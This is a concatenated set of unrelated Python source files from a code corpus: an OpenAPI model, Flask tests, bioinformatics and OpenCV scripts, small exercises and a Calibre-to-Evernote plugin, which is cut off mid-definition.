Employment Survey\",\n \"shortName\": \"BRES\"\n}, {\n \"id\": \"aaaaaaaa-0ac8-41d3-ae0e-567e5ea1eddd\",\n \"longName\": \"Another ONS Survey\",\n \"shortName\": \"NOTBRES\"\n}]\n\n#\n# /surveys/{id}\n#\n\n\ndef surveys_id_get(id):\n \"\"\"\n Get survey by survey id\n\n :param id: Survey identifier (uuid)\n :type id: str\n\n :rtype: None\n \"\"\"\n if id == 'id_example':\n id = 'cb0711c3-0ac8-41d3-ae0e-567e5ea1ef87'\n for doc in surveys:\n if doc['id'] == id:\n return make_response(jsonify(doc), 200)\n return make_response(jsonify('Not found'), 404)\n","sub_path":"swagger_server/controllers/survey_controller.py","file_name":"survey_controller.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642537540","text":"# PointOnSphereTest.py\r\n\r\ntable = {\r\n\t'o' : { 'o' : 0.0, '\\\\infty' : -1.0, 'euclid' : 0.0 },\r\n\t'\\\\infty' : { 'o' : -1.0, '\\\\infty' : 0.0, 'euclid' : 0.0 },\r\n\t'euclid' : { 'o' : 0.0, '\\\\infty' : 0.0, 'euclid' : None }\r\n}\r\n\r\ndef c3ga_bform( vecA, vecB ):\r\n\t\r\n\tif vecA != 'o' and vecA != '\\\\infty':\r\n\t\tvecA = 'euclid'\r\n\tif vecB != 'o' and vecB != '\\\\infty':\r\n\t\tvecB = 'euclid'\r\n\r\n\treturn table[ vecA ][ vecB ]\r\n\r\nreg_bform( c3ga_bform )\r\n\r\nno = Number( vector = 'o' )\r\nni = Number( vector = '\\\\infty' )\r\n\r\nx = Number( vector = 'x' )\r\npw = Number( scalar = 'w_p' )\r\n\r\np = ( no + x + 0.5*(x|x)*ni )\r\nlatex(p)\r\n\r\nc = Number( vector = 'c' )\r\nr = Number( scalar = 'r' )\r\nsw = Number( scalar = 'w_s' )\r\n\r\ns = ( no + c + 0.5*( (c|c) - (r*r) )*ni )\r\nlatex(s)\r\n\r\nt = p|s\r\nt.simplify()\r\nlatex(t)\r\n\r\n# PointOnSphereTest.py","sub_path":"wxAlgSys/Scripts/PointOnSphereTest.py","file_name":"PointOnSphereTest.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489883345","text":"#!/usr/bin/env 
python3\n#\n#Created on Sat Jun 7 14:27:49 2014\n#\n#@author: RDT\n#adapted by: CAR\n#\n\nfrom Bio import SeqIO\nimport csv\nimport sys\nfrom tqdm import tqdm\n\ndef get_seqs(seqfile, matches, outfile, comparecolumn, keepcolumn):\n #Open fasta contigs and return iterator of SeqRecords with protein sequences.\n records = SeqIO.parse(seqfile, \"fasta\")\n seqlist=[]\n matchlist=[]\n with open(matches,\"rU\") as f:\n reader = csv.reader(f,delimiter=\"\\t\")\n for row in reader:\n matchlist.append(row)\n print(\"Blast file successfully read\")\n print(\"Comparing contigs to Blast file\")\n\n proteinid = []\n for rec in tqdm(records):\n proteinid.clear()\n for match in matchlist:\n if match[0] == rec.id:\n for x in comparecolumn:\n if match[x] not in proteinid:\n proteinid.append(match[x])\n rec2 = rec[:]\n\n for column in keepcolumn:\n rec2.description += \"\\t\" + match[int(column)]\n\n seqlist.append(rec2)\n continue\n else:\n continue\n else:\n continue\n\n\n print(\"Writing annotated contigss\")\n with open(outfile, \"w\") as f:\n SeqIO.write(seqlist, f, \"fasta\")\n\n\n\ndef main():\n get_seqs(contigs, blast_hits, outfile, comparecolumn, keepcolumn)\n print (\"outfile is\", outfile)\n\n\n\n#grab arguments from console and pass them to python script\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n\n ####flags for the required inputs\n req_grp = parser.add_argument_group(title='required arguments')\n req_grp.add_argument(\"-c\", \"--contig_file\", dest = \"contigs\", required=True, help=\"Contigs input file \")\n req_grp.add_argument(\"-b\", \"--blast_hits\", dest = \"blast_hits\", required=True, help=\"Blast Input File\")\n ####end of flags for the required inputs\n\n parser.add_argument(\"-comp\", \"--colcompare\", dest = \"comparecolumn\", help = \"Column for Comparison, starts counting at '0' (default: 1)\", default = \"1\")\n parser.add_argument(\"-keep\", \"--colkeep\", dest = \"keepcolumn\", help = \"Columns to Keep, starts 
counting at '0' (default: 1, 2, 3, 10,13)\", default = \"1,2,3,10,13\")\n\n args = parser.parse_args()\n\n #assign variables from command line arguments\n contigs = args.contigs\n blast_hits = args.blast_hits\n comparecolumn = [int(x) for x in args.comparecolumn.split(\",\")]\n keepcolumn = [int(x) for x in args.keepcolumn.split(\",\")]\n\n print(\"contigs is\", contigs)\n print(\"blast file is\", blast_hits)\n outfile = contigs + \"_matches.fasta\"#blast_hits[:blast_hits.index(\".\")]+\".fasta\"\n print(\"Column used for comparison is\", comparecolumn)\n print(\"Columns being kept include:\", keepcolumn)\n\n #run main program\n main()\n","sub_path":"pull_seqs_from_assembly.py","file_name":"pull_seqs_from_assembly.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"428220210","text":"\"\"\"\nInstructions:\n\nImplement the classic method for composing secret messages called a square code.\nGiven an English text, output the encoded version of that text.\nFirst, the input is normalized: the spaces and punctuation are removed from the English text and the message is downcased.\nThen, the normalized characters are broken into rows. These rows can be regarded as forming a rectangle when printed with intervening newlines.\nFor example, the sentence\n\"If man was meant to stay on the ground, god would have given us roots.\"\nis normalized to:\n\"ifmanwasmeanttostayonthegroundgodwouldhavegivenusroots\"\nThe plaintext should be organized in to a rectangle. 
The size of the rectangle (r x c) should be decided by the length of the message,\nsuch that c >= r and c - r <= 1, where c is the number of columns and r is the number of rows.\nOur normalized text is 54 characters long, dictating a rectangle with c = 8 and r = 7:\n\"ifmanwas\"\n\"meanttos\"\n\"tayonthe\"\n\"groundgo\"\n\"dwouldha\"\n\"vegivenu\"\n\"sroots \"\nThe coded message is obtained by reading down the columns going left to right.\nThe message above is coded as:\n\"imtgdvsfearwermayoogoanouuiontnnlvtwttddesaohghnsseoau\"\nOutput the encoded text in chunks that fill perfect rectangles (r X c), with c chunks of r length, separated by spaces.\nFor phrases that are n characters short of the perfect rectangle, pad each of the last n chunks with a single trailing space.\n\"imtgdvs fearwer mayoogo anouuio ntnnlvt wttddes aohghn sseoau \"\n\"\"\"\n\nimport math\n\n\ndef cipher_text(plain_text):\n plain_text = plain_text.lower()\n plain_text = \"\".join(i for i in plain_text if i.isalnum())\n if plain_text == \"\":\n return \"\"\n sqrt_of_len = math.sqrt(len(plain_text))\n if sqrt_of_len.is_integer():\n r = int(sqrt_of_len)\n c = int(sqrt_of_len)\n else:\n if len(plain_text) <= int(sqrt_of_len)*(int(sqrt_of_len) + 1):\n plain_text += \" \" * (int(sqrt_of_len)*(int(sqrt_of_len) + 1) - len(plain_text))\n r = int(sqrt_of_len)\n c = int(sqrt_of_len) + 1\n else:\n plain_text += \" \" * ((int(sqrt_of_len) + 1)**2 - len(plain_text))\n r = int(sqrt_of_len) + 1\n c = int(sqrt_of_len) + 1\n final_ish = \"\"\n for j in range(c):\n for count, i in enumerate(plain_text):\n if count % c == j:\n final_ish += i\n return \" \".join(final_ish[i:i+r] for i in range(0, len(final_ish), r))\n","sub_path":"Exercism Python Track/Crypto_Square.py","file_name":"Crypto_Square.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"160663131","text":"def countSubstrings(s):\n \"\"\"\n :type s: str\n 
:rtype: int\n \"\"\"\n palindrome_count = 0\n\n for i in range(len(s)):\n for j in range(i, len(s)):\n sub_str = s[i:j+1]\n if sub_str == sub_str[::-1]:\n # print(sub_str)\n palindrome_count += 1\n return palindrome_count\n\n\ndef countSubstrings_pythonic(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n sub_str_list = [s[i:j+1] for i in range(len(s)) for j in range(i, len(s)) if s[i:j+1] == s[i:j+1][::-1]]\n\n return len(sub_str_list)\n\n\ncheck_str = \"aabcdde\"\nres = countSubstrings(check_str)\nprint(res)\n\n","sub_path":"data_structures/string_countPalindromicSubstrings.py","file_name":"string_countPalindromicSubstrings.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45185365","text":"'''\n-Documentation here-\n'''\nimport menu\nimport os\ntoys = [\n {\"Name\":\"Woody\",\"Species\":\"Human\",\"Height\":15.8,\"NumFeet\":2,\"FirstAppearance\":1},\n {\"Name\":\"Jessie\",\"Species\":\"Human\",\"Height\":13.4,\"NumFeet\":2,\"FirstAppearance\":2},\n {\"Name\":\"Buzz Lightyear\",\"Species\":\"Human\",\"Height\":11.43,\"NumFeet\":2,\"FirstAppearance\":1}\n]\nos.system(\"cls\")\n#This is the start of the main function\nwhile True: #This loop is to ensure that the program does not just terminate after a single command\n command = menu.menu()\n \n if command == 1:\n menu.searchToy(toys)\n elif command == 2:\n toys = menu.declutter(toys)\n elif command == 3:\n added_toy = menu.addToys(toys)\n toys.append(added_toy) \n elif command == 4:\n menu.edit_toy(toys)\n elif command == 5:\n menu.playtime(toys)\n elif command == 6:\n selected_toy = menu.select_toy(toys)\n elif command == 7:\n menu.print_toy(toys)\n elif command == 8:\n menu.save(toys)\n elif command == 9:\n toys = menu.load(toys)\n elif command == 0:\n print(\n \"\\n================================================\\n\"\n + \"It's bedtime! 
Sleep dreams!\\n\"\n + \"================================================\\n\"\n )\n break","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283116412","text":"\"\"\"\nIn computer science and discrete mathematics, \nan inversion in a sequence is a pair of elements \nthat are out of their natural order.\nO(n*logn)\n\"\"\"\n\n\ndef count_inversions(array:list[int], score:int=0) -> list[list[int], int]:\n \"\"\"\n Counts inversions in the givven array\n and returns a sorted initial array with count of inversions\n \"\"\"\n length = len(array)\n half = int(length/2) if length % 2 == 0 else int(length/2) + 1\n score = score\n if length > 1:\n left, score_l = count_inversions(array[:half], score)\n right, score_r = count_inversions(array[half:], score)\n score += score_l\n score += score_r\n l_count = half\n r_count = length - half\n res = []\n for i in range(length):\n if l_count == 0:\n res.extend(right[-r_count:])\n break\n if r_count == 0:\n res.extend(left[-l_count:])\n break\n if left[-l_count] < right[-r_count]:\n res.append(left[-l_count])\n l_count -= 1\n if left[-l_count] >= right[-r_count]:\n res.append(right[-r_count])\n r_count -= 1\n score += l_count\n return [res, score]\n return [array, score]\n\n\narr = [6, 5, 4, 3, 2, 1]\nprint(count_inversions(arr))\n","sub_path":"calculations/count_inversions.py","file_name":"count_inversions.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164842999","text":"from LogisticRegressor import LogisticRegressor\nimport torch\nimport matplotlib.pyplot as plt\n\n# Generating synthetic data\nn_points_per_label = 50\nlabel_0_points = 3*torch.rand(n_points_per_label) + 3\nlabel_1_points = 3*torch.rand(n_points_per_label) + 5\n\nlabel_0 = torch.zeros(n_points_per_label)\nlabel_1 = 
torch.ones(n_points_per_label)\n\nx = torch.cat((label_0_points, label_1_points), 0).view(-1, 1)\ntarget = torch.cat((label_0, label_1), 0)\n\n# Instantiating and fitting the regressor \nregressor = LogisticRegressor()\nregressor.fit(x, target, n_iters=2000)\n\n# Getting the error during the fitting process\nerror = regressor.get_error()\n\n# Generating probability distribution curve\nx_test = torch.linspace(label_0_points.min(), label_1_points.max()).view(-1, 1)\npredicted = regressor.predict(x_test)\n\n# Plotting\nplt.style.use('ggplot')\nfig, ax = plt.subplots(2, 1)\nax[0].plot(x_test, predicted.detach(), color='black', label='Probability distribution')\nax[0].scatter(label_0_points, label_0, label=\"Class 0\")\nax[0].scatter(label_1_points, label_1, label=\"Class 1\")\nax[1].plot(error)\nax[0].legend()\nax[0].set_xlabel(\"Feature\")\nax[0].set_ylabel(\"Class labels/Probability\")\nax[1].set_xlabel(\"Iterations\")\nax[1].set_ylabel(\"Loss (Binary Cross Entropy)\")\n\nplt.suptitle(\"Logistic Regression Example\")\nplt.show()\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"548609976","text":"# coding: utf-8\n\n\"\"\"\n FlowAccount Open API\n\n # Introduction **Servers Production** Site: https://www.flowaccount.com Api url: https://openapi.flowaccount.com/v1 **Beta test** Site: http://sandbox-new.flowaccount.com/ Api url: https://openapi.flowaccount.com/test **PostMan Collection** Link: https://www.getpostman.com/collections/01e7c68d7093e2092a64 # noqa: E501\n\n The version of the OpenAPI document: 2-oas3\n Contact: developer_support@flowaccount.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom openapi_client.configuration import Configuration\n\n\nclass UpgradeDocument(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n 
Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'record_id': 'int',\n 'reference_document_serial': 'str',\n 'reference_document_type': 'int'\n }\n\n attribute_map = {\n 'record_id': 'recordId',\n 'reference_document_serial': 'referenceDocumentSerial',\n 'reference_document_type': 'referenceDocumentType'\n }\n\n def __init__(self, record_id=None, reference_document_serial=None, reference_document_type=None, local_vars_configuration=None): # noqa: E501\n \"\"\"UpgradeDocument - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._record_id = None\n self._reference_document_serial = None\n self._reference_document_type = None\n self.discriminator = None\n\n self.record_id = record_id\n self.reference_document_serial = reference_document_serial\n self.reference_document_type = reference_document_type\n\n @property\n def record_id(self):\n \"\"\"Gets the record_id of this UpgradeDocument. # noqa: E501\n\n id ของเอกสารต้นทาง # noqa: E501\n\n :return: The record_id of this UpgradeDocument. # noqa: E501\n :rtype: int\n \"\"\"\n return self._record_id\n\n @record_id.setter\n def record_id(self, record_id):\n \"\"\"Sets the record_id of this UpgradeDocument.\n\n id ของเอกสารต้นทาง # noqa: E501\n\n :param record_id: The record_id of this UpgradeDocument. 
# noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and record_id is None: # noqa: E501\n raise ValueError(\"Invalid value for `record_id`, must not be `None`\") # noqa: E501\n\n self._record_id = record_id\n\n @property\n def reference_document_serial(self):\n \"\"\"Gets the reference_document_serial of this UpgradeDocument. # noqa: E501\n\n เลขที่เอกสารต้นทาง
Example: QT20200101 # noqa: E501\n\n :return: The reference_document_serial of this UpgradeDocument. # noqa: E501\n :rtype: str\n \"\"\"\n return self._reference_document_serial\n\n @reference_document_serial.setter\n def reference_document_serial(self, reference_document_serial):\n \"\"\"Sets the reference_document_serial of this UpgradeDocument.\n\n เลขที่เอกสารต้นทาง
Example: QT20200101 # noqa: E501\n\n :param reference_document_serial: The reference_document_serial of this UpgradeDocument. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and reference_document_serial is None: # noqa: E501\n raise ValueError(\"Invalid value for `reference_document_serial`, must not be `None`\") # noqa: E501\n\n self._reference_document_serial = reference_document_serial\n\n @property\n def reference_document_type(self):\n \"\"\"Gets the reference_document_type of this UpgradeDocument. # noqa: E501\n\n เลขประเภทของเอกสารต้นทาง
Quotaions = 3
Billing Notes = 5
Tax Invoices = 7
Example: 3 # noqa: E501\n\n :return: The reference_document_type of this UpgradeDocument. # noqa: E501\n :rtype: int\n \"\"\"\n return self._reference_document_type\n\n @reference_document_type.setter\n def reference_document_type(self, reference_document_type):\n \"\"\"Sets the reference_document_type of this UpgradeDocument.\n\n เลขประเภทของเอกสารต้นทาง
Quotaions = 3
Billing Notes = 5
Tax Invoices = 7
Example: 3 # noqa: E501\n\n :param reference_document_type: The reference_document_type of this UpgradeDocument. # noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and reference_document_type is None: # noqa: E501\n raise ValueError(\"Invalid value for `reference_document_type`, must not be `None`\") # noqa: E501\n\n self._reference_document_type = reference_document_type\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, UpgradeDocument):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, UpgradeDocument):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"flowaccount-python-client/openapi_client/models/upgrade_document.py","file_name":"upgrade_document.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401195238","text":"import cv2\r\nimport glob\r\nimport isolate\r\nimg = [cv2.imread(file) for file in 
glob.glob(\"*.jpg\")]\r\n\r\nprint(len(img))\r\nfor i in range (len(img)):\r\n #imgCopy = img[i].copy()\r\n img[i] = isolate.findBackPlate(img[i])\r\n img[i] = cv2.cvtColor(img[i],cv2.COLOR_BGR2HSV)\r\n imgCopy = img[i].copy()\r\n #img[i] = cv2.inRange(img[i],(50,0,0),(310,255,255))\r\n mask1 = cv2.inRange(img[i], (50, 0, 0), (200, 255,230))\r\n\r\n ## mask o yellow (15,0,0) ~ (36, 255, 255)\r\n mask2 = cv2.inRange(img[i], (360,0,0), (360, 255, 220))\r\n\r\n ## final mask and masked\r\n mask = cv2.bitwise_or(mask1, mask2)\r\n target = cv2.bitwise_and(imgCopy,imgCopy, mask=mask)\r\n target = cv2.cv2.cvtColor(target,cv2.COLOR_HSV2BGR)\r\n cv2.imshow(\"image\",target)\r\n cv2.waitKey()\r\n \r\n\r\n'''\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\nimport isolate\r\nimport lineSearch\r\nfrom matplotlib import pyplot as plt\r\nimg = [cv2.imread(file) for file in glob.glob(\"*.jpg\")]\r\nfor i in range (len(img)):\r\n img[i] = cv2.resize(img[i], (int(img[i].shape[1]/3), int(img[i].shape[0]/3)))\r\n try:\r\n lineSearch.findLines(img[i],img[i],img[i])\r\n print(\"YES\")\r\n except:\r\n 2\r\n img[i] = isolate.findBackPlate(img[i],1.5,250,40,100,100,200)\r\n img[i] = isolate.findBackPlate(img[i],1.5,250,110,78,120,1000)\r\n edges = cv2.Canny(img[i],100,200)\r\n\r\n plt.subplot(121),plt.imshow(img[i],cmap = 'gray')\r\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\r\n plt.subplot(122),plt.imshow(edges,cmap = 'gray')\r\n plt.title('Edge Image'), plt.xticks([]), plt.yticks([])\r\n\r\n plt.show()\r\n cv2.waitKey()\r\n#circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.5, 250,param1=40,param2=100,minRadius=100,maxRadius=200)\r\n#circles = cv2.HoughCircles(grey, cv2.HOUGH_GRADIENT, 1.5, 
250,param1=110,param2=78,minRadius=120,maxRadius=300)\r\n'''\r\n","sub_path":"rootRecognition/edge_detection.py","file_name":"edge_detection.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129855736","text":"#打开文件\n# file_name='demo.txt'\n\n#调用open来打开文件\n# file_obj=open(file_name)\n\n# #当我们获取了文件对象后,所以的对文件的操作都应该通过对象来进行\n# #读取文件中的内容\n# #read()方法,用来读取文件中的内容,它会将内容全部返回\t保存为字符串返回\n# content=file_obj.read()\n\n# print(content)\n\n# #关闭文件\n# #调用close()方法来关闭文件\n# file_obj.close()\n\n\n\n#with.......as语句\n# with open(file_name) as file_obj:\n# \t#在with语句中可以直接使用file_obj来做文件操作\n# \t#此时这个文件只能在with中使用,一旦with结束则文件会自动close()\n# \tprint(file_obj.read())\n\n\n\nfile_name='demo.txt'\n\ntry:\n\twith open(file_name) as file_obj :\n\t\tprint(file_obj.read())\nexcept FileNotFoundError:\n\tprint(f'{file_name} 文件不存在')\n","sub_path":"第七章code/05.关闭文件.py","file_name":"05.关闭文件.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66297566","text":"# This file is part of sner4 project governed by MIT license, see the LICENSE.txt file.\n\"\"\"\ncontroller scheduler.task tests\n\"\"\"\n\nimport json\nimport os\nfrom http import HTTPStatus\n\nfrom flask import url_for\n\nfrom sner.server.model.scheduler import Queue, Task\nfrom tests.server.model.scheduler import create_test_task\n\n\ndef test_task_list_route(cl_operator):\n \"\"\"task list route test\"\"\"\n\n response = cl_operator.get(url_for('scheduler.task_list_route'))\n assert response.status_code == HTTPStatus.OK\n\n\ndef test_task_list_json_route(cl_operator, test_task):\n \"\"\"task list_json route test\"\"\"\n\n response = cl_operator.post(url_for('scheduler.task_list_json_route'), {'draw': 1, 'start': 0, 'length': 1, 'search[value]': test_task.name})\n assert response.status_code == HTTPStatus.OK\n response_data = 
json.loads(response.body.decode('utf-8'))\n assert response_data['data'][0]['name'] == test_task.name\n\n response = cl_operator.post(\n url_for('scheduler.task_list_json_route', filter='Task.name==\"%s\"' % test_task.name),\n {'draw': 1, 'start': 0, 'length': 1})\n assert response.status_code == HTTPStatus.OK\n response_data = json.loads(response.body.decode('utf-8'))\n assert response_data['data'][0]['name'] == test_task.name\n\n\ndef test_task_add_route(cl_operator):\n \"\"\"task add route test\"\"\"\n\n test_task = create_test_task()\n\n form = cl_operator.get(url_for('scheduler.task_add_route')).form\n form['name'] = test_task.name\n form['module'] = test_task.module\n form['params'] = test_task.params\n response = form.submit()\n assert response.status_code == HTTPStatus.FOUND\n\n task = Task.query.filter(Task.name == test_task.name).one()\n assert task.name == test_task.name\n assert task.module == test_task.module\n assert task.params == test_task.params\n\n\ndef test_task_edit_route(cl_operator, test_task):\n \"\"\"task edit route test\"\"\"\n\n form = cl_operator.get(url_for('scheduler.task_edit_route', task_id=test_task.id)).form\n form['name'] = form['name'].value+' edited'\n form['params'] = form['params'].value+' added_parameter'\n response = form.submit()\n assert response.status_code == HTTPStatus.FOUND\n\n task = Task.query.get(test_task.id)\n assert task.name == form['name'].value\n assert 'added_parameter' in task.params\n\n\ndef test_task_delete_route(cl_operator, test_job_completed):\n \"\"\"task delete route test\"\"\"\n\n test_queue = Queue.query.get(test_job_completed.queue_id)\n test_queue_data_abspath = test_queue.data_abspath\n test_task = Task.query.get(test_queue.task_id)\n assert os.path.exists(test_queue_data_abspath)\n\n form = cl_operator.get(url_for('scheduler.task_delete_route', task_id=test_task.id)).form\n response = form.submit()\n assert response.status_code == HTTPStatus.FOUND\n\n assert not Task.query.get(test_task.id)\n 
assert not os.path.exists(test_queue_data_abspath)\n","sub_path":"tests/server/controller/scheduler/test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29749777","text":"#!/usr/bin/env python\n# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\n\n__license__ = 'GPL v3'\n__copyright__ = '2011, Kovid Goyal '\n__docformat__ = 'restructuredtext en'\n\n\nfrom PyQt5.Qt import QDialog, QVBoxLayout, QPushButton, QMessageBox, QLabel, QUrl, QInputDialog, QDir\n\nfrom calibre_plugins.calibrebeam.config import prefs\nimport calibre_plugins.calibrebeam.deps.evernote.edam.type.ttypes as Types\nfrom calibre.ebooks.BeautifulSoup import BeautifulSoup\nfrom calibre.gui2 import error_dialog, question_dialog, info_dialog, open_url\nimport socket\n\nclass calibrebeamDialog(QDialog):\n \n def __init__(self, gui, icon, do_user_config):\n # TODO: edit to be per user stamp?\n self.SENT_STAMP = '

COMMENTS ALREADY SENT TO EVERNOTE

'\n self.ANNOTATIONS_PRESENT_STRING = 'class=\"annotation\"'\n self.note_store = None\n\n QDialog.__init__(self, gui)\n self.gui = gui\n self.do_user_config = do_user_config\n self.cached_prefs_notebook_guid = None\n\n # The current database shown in the GUI\n # db is an instance of the class LibraryDatabase2 from database.py\n # This class has many, many methods that allow you to do a lot of\n # things.\n self.db = gui.current_db\n\n self.l = QVBoxLayout()\n self.setLayout(self.l)\n\n top_msg = 'Logged into evernote: ' + prefs['oauth_username'] if prefs['oauth_username'] else ''\n self.label = QLabel(top_msg)\n self.l.addWidget(self.label)\n \n self.devkey_token = \"1tjcaron-3617\"\n self.devkey_secret = \"5f3e4368a027d923\"\n\n self.setWindowTitle('Calibrebeam Evernote Sync')\n self.setWindowIcon(icon)\n self.init_buttons()\n self.resize(self.sizeHint())\n\n\n def init_buttons(self):\n self.send_new_button = QPushButton(\n 'Beam All Unsent Annotations', self)\n self.send_new_button.clicked.connect(self.send_only_new_highlights_to_evernote)\n self.l.addWidget(self.send_new_button)\n \n self.sync_highlighted_button = QPushButton(\n 'Beam Highlighted', self)\n self.sync_highlighted_button.clicked.connect(self.send_selected_highlights_to_evernote)\n self.l.addWidget(self.sync_highlighted_button)\n\n self.config_button = QPushButton(\n 'Settings', self)\n self.config_button.clicked.connect(self.config)\n self.l.addWidget(self.config_button)\n\n def config(self):\n self.do_user_config(parent=self)\n\n def authorize_plugin(self):\n username, ok_u = QInputDialog.getText(self, 'Input Dialog', 'Enter your Evernote Username:')\n if not ok_u:\n return None, None\n password, ok_p = QInputDialog.getText(self, 'Input Dialog', 'Enter your Evernote password:')\n if not ok_p:\n return None, None\n permission_msg = u'''\n Do you want to allow calibrebeam to:\n \\u2022 Create notes, notebooks and tags.\n \\u2022 List notebooks and tags.\n '''\n if not question_dialog(self, 'Allow 
Access', permission_msg):\n return None, None\n\n return username, password\n\n def connect_to_evernote(self):\n if self.note_store:\n return self.note_store\n else:\n return self.create_note_store()\n\n def create_note_store(self):\n try:\n from calibre_plugins.calibrebeam.config import get_username_and_token\n username, auth_token = get_username_and_token()\n return self.create_new_note_store(username, auth_token)\n except socket.gaierror:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n\n def get_auth_token(self, password, username):\n try:\n from calibre_plugins.calibrebeam.deps.geeknote.oauth import GeekNoteAuth\n gna = GeekNoteAuth()\n auth_token = gna.getToken(username, password)\n return auth_token\n except socket.gaierror or TypeError:\n info_dialog(self, 'INTERNET',\n 'connectivity is bad',\n show=True)\n return None\n\n def create_new_note_store(self, username=None, auth_token=None):\n reset_stored_creds = False\n if not (username and auth_token):\n reset_stored_creds = True\n username, password = self.authorize_plugin()\n if not (username and password):\n return None\n auth_token = self.get_auth_token(password, username)\n if not auth_token:\n # timout or connectivity or something\n return None\n if auth_token == \"ERROR\":\n # probably typed wrong stuffs\n info_dialog(self, 'EVERNOTE',\n 'Could not login. 
Please verify your Evernote username and password and try again.',\n show=True)\n return None\n from calibre_plugins.calibrebeam.deps.evernote.api.client import EvernoteClient\n client = EvernoteClient(token=auth_token, sandbox=True)\n self.note_store = client.get_note_store()\n # if we successfully made a note store, then we should save this token for next bootup\n if reset_stored_creds:\n from calibre_plugins.calibrebeam.config import save_username_and_token\n save_username_and_token(username, auth_token)\n self.label.setText('Logged into evernote as ' + prefs['oauth_username'])\n return self.note_store\n\n def send_selected_highlights_to_evernote(self):\n from calibre.gui2 import error_dialog, info_dialog\n if not self.connect_to_evernote():\n return\n # Get currently selected books\n rows = self.gui.library_view.selectionModel().selectedRows()\n if not rows or len(rows) == 0:\n return error_dialog(self.gui, 'Cannot beam highlights to Evernote',\n 'No books selected', show=True)\n # Map the rows to book ids\n ids = list(map(self.gui.library_view.model().id, rows))\n for book_id in ids:\n self.send_book_to_evernote(book_id)\n info_dialog(self, 'Updated files',\n 'beamed %d book highlights to Evernote!'%len(ids),\n show=True)\n \n def send_only_new_highlights_to_evernote(self):\n from calibre.gui2 import error_dialog, info_dialog\n if not self.connect_to_evernote():\n return\n # Get currently selected books\n rows = self.gui.library_view.selectionModel().selectedRows()\n if not rows or len(rows) == 0:\n return error_dialog(self.gui, 'Cannot beam highlights to Evernote',\n 'No books selected', show=True)\n # Map the rows to book ids\n #ids = list(map(self.gui.library_view.model().id, rows))\n ids = self.db.new_api.all_book_ids()\n sent_count = 0\n for book_id in ids:\n if self.send_book_to_evernote_if_nb(book_id, True):\n sent_count = sent_count + 1\n info_dialog(self, 'Updated files',\n 'sent %d book highlights to Evernote!'%sent_count,\n show=True)\n\n \n def 
